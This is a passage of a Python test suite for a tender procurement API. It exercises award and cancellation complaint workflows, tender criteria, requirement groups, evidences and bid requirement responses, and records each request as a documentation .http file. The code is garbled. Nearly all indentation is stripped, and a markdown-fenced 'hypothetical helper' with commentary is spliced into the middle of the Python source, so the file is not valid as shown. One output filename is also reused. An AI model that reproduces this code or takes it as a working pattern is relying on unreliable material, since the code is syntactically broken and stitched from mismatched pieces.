with open(TARGET_DIR + 'complaints/award-complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint1_id, owner_token),
{'data': {
"tendererAction": "Умови виправлено, вибір переможня буде розгянуто повторно",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
if get_now() < RELEASE_2020_04_19:
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping",
}},
status=200,
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
else:
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping",
}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint4_id, complaint4_token),
{'data': {
"status": "declined",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-satisfied-resolving.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
{'data': {
"status": "cancelled"
}})
self.assertEqual(response.status, '200 OK')
award_id = response.headers['Location'][-32:]
complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
{"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-submit.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
if get_now() < RELEASE_2020_04_19:
# before RELEASE_2020_04_19 the pending -> mistaken transition was performed by the reviewer
self.app.authorization = ('Basic', ('broker', ''))
complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
with open(TARGET_DIR + 'complaints/award-complaint-mistaken.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
award_id,
complaint9_id,
complaint9_token
),
{'data': {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
else:
# since RELEASE_2020_04_19 the draft -> mistaken transition is performed by the complainant
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint9_id = response.json['data']['id']
complaint9_token = response.json['access']['token']
with open(TARGET_DIR + 'complaints/award-complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
award_id,
complaint9_id,
complaint9_token),
{'data': {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
def test_cancellation_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
# Move the cancellation to pending so it enters its complaint period
response = self.app.post_json(
'/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token),
{'data': {'reason': 'cancellation reason', 'reasonType': 'noDemand'}})
cancellation_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{"data": {
"title": "Notice.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints'.format(
self.tender_id, cancellation_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/cancellation-complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints/{}/documents?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, complaint1_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
complaint_data = {'data': complaint.copy()}
complaint_url = "/tenders/{}/cancellations/{}/complaints".format(self.tender_id, cancellation_id)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data)
with open(TARGET_DIR + 'complaints/cancellation-complaint-complaint.http', 'w') as self.app.file_obj:
if get_now() < RELEASE_2020_04_19:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, complaint1_token),
{"data": {"status": "pending"}})
else:
with change_auth(self.app, ("Basic", ("bot", ""))):
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint6_id, complaint6_token = complaint_create_pending(self, complaint_url, complaint_data)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/cancellation-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint4_id),
{'data': {
"status": "invalid",
"rejectReason": "tenderCancelled",
"rejectReasonDescription": "reject reason description",
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "some",
}})
self.assertEqual(response.status, '200 OK')
for accepted_complaint_id in (complaint3_id, complaint5_id, complaint6_id):
    response = self.app.patch_json(
        '/tenders/{}/cancellations/{}/complaints/{}'.format(
            self.tender_id, cancellation_id, accepted_complaint_id),
        {'data': {
            "status": "accepted",
            "reviewDate": get_now().isoformat(),
            "reviewPlace": "some",
        }})
    self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints/{}/documents'.format(
self.tender_id, cancellation_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id),
{'data': {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint3_id),
{'data': {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint5_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation_id, owner_token),
{'data': {'status': 'unsuccessful'}}
)
self.assertEqual(response.status_code, 200)
with open(TARGET_DIR + 'complaints/cancellation-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}?acc_token={}'.format(
self.tender_id, cancellation_id, complaint1_id, owner_token),
{'data': {
"tendererAction": "Умови виправлено",
"status": "resolved",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/cancellation-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint6_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled",
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
# Create a new cancellation
response = self.app.post_json(
'/tenders/{}/cancellations?acc_token={}'.format(
self.tender_id, owner_token),
{'data': {'reason': 'cancellation reason', 'reasonType': 'unFixable'}})
cancellation2_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/documents?acc_token={}'.format(
self.tender_id, cancellation2_id, owner_token),
{"data": {
"title": "Notice.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
response = self.app.patch_json(
'/tenders/{}/cancellations/{}?acc_token={}'.format(
self.tender_id, cancellation2_id, owner_token),
{'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json(
'/tenders/{}/cancellations/{}/complaints'.format(self.tender_id, cancellation2_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/cancellation-complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/cancellations/{}/complaints'.format(
self.tender_id, cancellation_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/cancellation-complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/cancellations/{}/complaints/{}'.format(
self.tender_id, cancellation_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
def test_tender_criteria_article_17(self):
self.app.authorization = ('Basic', ('broker', ''))
tender_data = deepcopy(test_tender_data)
tender_data.update({"status": "draft"})
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
other_criteria = deepcopy(test_criterion_data)
other_criteria["classification"]["id"] = "CRITERION.OTHER"
exclusion_criteria = deepcopy(test_criterion_data)
with open(TARGET_DIR + 'criteria/bulk-create-criteria.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': [other_criteria]},
)
self.assertEqual(response.status, '201 Created')
criteria_1 = response.json['data'][0]
criteria_id_1 = criteria_1['id']
# Try to update tender from `draft` to `active.tendering` without criteria
with open(TARGET_DIR + 'criteria/update-tender-status-without-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.tendering"}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/bulk-create-exclusion-criteria.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': [exclusion_criteria]},
)
self.assertEqual(response.status, '201 Created')
criteria_2 = response.json['data'][0]
criteria_id_2 = criteria_2['id']
with open(TARGET_DIR + 'criteria/patch-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
# Try to patch exclusion criteria
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, owner_token),
{'data': {'title': 'Updated title'}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
# Requirement group operations
rg_id_1 = criteria_1["requirementGroups"][0]["id"]
rg_id_2 = criteria_2["requirementGroups"][0]["id"]
test_rg_data = deepcopy(test_requirement_group_data)
with open(TARGET_DIR + 'criteria/add-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups?acc_token={}'.format(
self.tender_id, criteria_id_1, owner_token),
{'data': test_rg_data},
)
self.assertEqual(response.status, '201 Created')
# Try to add requirement group to exclusion criteria
with open(TARGET_DIR + 'criteria/add-exclusion-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups?acc_token={}'.format(
self.tender_id, criteria_id_2, owner_token),
{'data': test_rg_data},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/patch-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, owner_token),
{'data': {'description': 'Updated description'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, owner_token),
{'data': {'title': 'Updated title'}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
with open(TARGET_DIR + 'criteria/criteria-requirement-group-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups'.format(self.tender_id, criteria_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-group.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}'.format(self.tender_id, criteria_id_1, rg_id_1),
)
self.assertEqual(response.status, '200 OK')
# Requirement operations
requirement_id_1 = criteria_1["requirementGroups"][0]["requirements"][0]["id"]
requirement_id_2 = criteria_2["requirementGroups"][0]["requirements"][0]["id"]
with open(TARGET_DIR + 'criteria/add-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, owner_token),
{'data': test_requirement_data},
)
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'criteria/add-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, owner_token),
{'data': test_requirement_data},
status=403
)
self.assertEqual(response.status, '403 Forbidden')
test_evidence_data = deepcopy(test_eligible_evidence_data)
with open(TARGET_DIR + 'criteria/patch-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [test_evidence_data]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/patch-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [
test_evidence_data,
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements'.format(
self.tender_id, criteria_id_1, rg_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1),
)
self.assertEqual(response.status, '200 OK')
# Eligible evidence operations
test_evidence_data_1 = deepcopy(test_evidence_data)
test_evidence_data_2 = deepcopy(test_evidence_data)
test_evidence_data_2["type"] = "statement"
with open(TARGET_DIR + 'criteria/bulk-update-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [test_evidence_data_1, test_evidence_data_2]}},
)
self.assertEqual(response.status, '200 OK')
evidence = response.json["data"]["eligibleEvidences"][1]
with open(TARGET_DIR + 'criteria/bulk-delete-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [evidence]}},
)
self.assertEqual(response.status, '200 OK')
self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{"data": {"eligibleEvidences": [test_evidence_data_1, test_evidence_data_2]}},
)
with open(TARGET_DIR + 'criteria/add-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, owner_token),
{'data': test_evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json['data']['id']
with open(TARGET_DIR + 'criteria/patch-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id, owner_token),
{'data': {'title_en': 'Documented approve'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-evidences-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}/evidences/{}?acc_token={}'.format(
self.tender_id, criteria_id_1, rg_id_1, requirement_id_1, evidence_id, owner_token),
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-list.http', 'wb') as self.app.file_obj:
response = self.app.get('/tenders/{}/criteria'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria.http', 'wb') as self.app.file_obj:
response = self.app.get('/tenders/{}/criteria/{}'.format(self.tender_id, criteria_id_1))
self.assertEqual(response.status, '200 OK')
self.set_status("active.tendering")
with open(TARGET_DIR + 'criteria/put-exclusion-criteria-requirement.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'title': 'Updated title',
'eligibleEvidences': [
test_evidence_data,
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-add-evidence.http', 'wb') as self.app.file_obj:
test_evidence_data_new = deepcopy(test_evidence_data)
test_evidence_data_new["title"] = "new, added by requirement PUT"
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': [
test_evidence_data,
test_evidence_data_new
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-update-evidence.http', 'wb') as self.app.file_obj:
test_evidence_data_new["title"] = "changed_new, changed by requirement PUT"
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': [
test_evidence_data,
test_evidence_data_new
]
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-put-delete-evidence.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'eligibleEvidences': []
}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/criteria-requirement-cancellation.http', 'wb') as self.app.file_obj:
response = self.app.put_json(
'/tenders/{}/criteria/{}/requirement_groups/{}/requirements/{}?acc_token={}'.format(
self.tender_id, criteria_id_2, rg_id_2, requirement_id_2, owner_token),
{'data': {
'status': 'cancelled'
}},
)
self.assertEqual(response.status, '200 OK')
def test_bid_requirement_response(self):
tender_data = deepcopy(test_tender_data)
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[:2])
criteria_data[1]["requirementGroups"][0]["requirements"].append({
"dataType": "boolean",
"expectedValue": "true",
"title": "Additional requirement"
})
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid_data})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
"/tenders/{}/bids/{}/documents?acc_token={}".format(
self.tender_id, bid_id, bid_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_1_2 = criteria[0]["requirementGroups"][1]["requirements"][0]
requirement_2_1 = criteria[1]["requirementGroups"][0]["requirements"][0]
requirement_2_2 = criteria[1]["requirementGroups"][0]["requirements"][1]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1_1["id"],
"title": requirement_1_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1_1 = deepcopy(rr_mock)
rr_1_2 = deepcopy(rr_mock)
rr_1_2["requirement"] = {
"id": requirement_1_2["id"],
"title": requirement_1_2["title"],
}
rr_2_1 = deepcopy(rr_mock)
rr_2_1["title"] = "Requirement response 2"
rr_2_1["requirement"] = {
"id": requirement_2_1["id"],
"title": requirement_2_1["title"],
}
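# The rr_* fixtures above are assembled by hand for specific requirements. A
# hedged sketch of a generic builder (hypothetical helper, not part of this
# suite) that answers exactly one requirement group per criterion, which is
# what the bid activation checks in this test expect:

```python
# Hypothetical helper (assumption, not part of the original test suite):
# build one requirementResponse per requirement, answering exactly one
# requirement group per criterion.
def build_requirement_responses(criteria, value="True"):
    responses = []
    for criterion in criteria:
        # answer a single group; responding across several groups of the
        # same criterion is rejected with 422 on activation
        group = criterion["requirementGroups"][0]
        for requirement in group["requirements"]:
            responses.append({
                "title": "Requirement response",
                "requirement": {
                    "id": requirement["id"],
                    "title": requirement["title"],
                },
                "value": value,
            })
    return responses
```

# Usage: build_requirement_responses(criteria) yields a list suitable for
# {'data': {'requirementResponses': [...]}} in the patches below.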
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-1.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-not-all-criteria.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-2.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_1_2, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-answered-on-two-groups.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/requirement-response-basic-data-3.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/bid-activation-not-all-requirements.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'status': 'active'}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
with open(TARGET_DIR + 'criteria/add-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
rr_1_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': [rr_1_1, rr_2_1]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response-from-bid.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {'requirementResponses': []}},
)
self.assertEqual(response.status, '200 OK')
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/bids/{}/requirement_responses?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
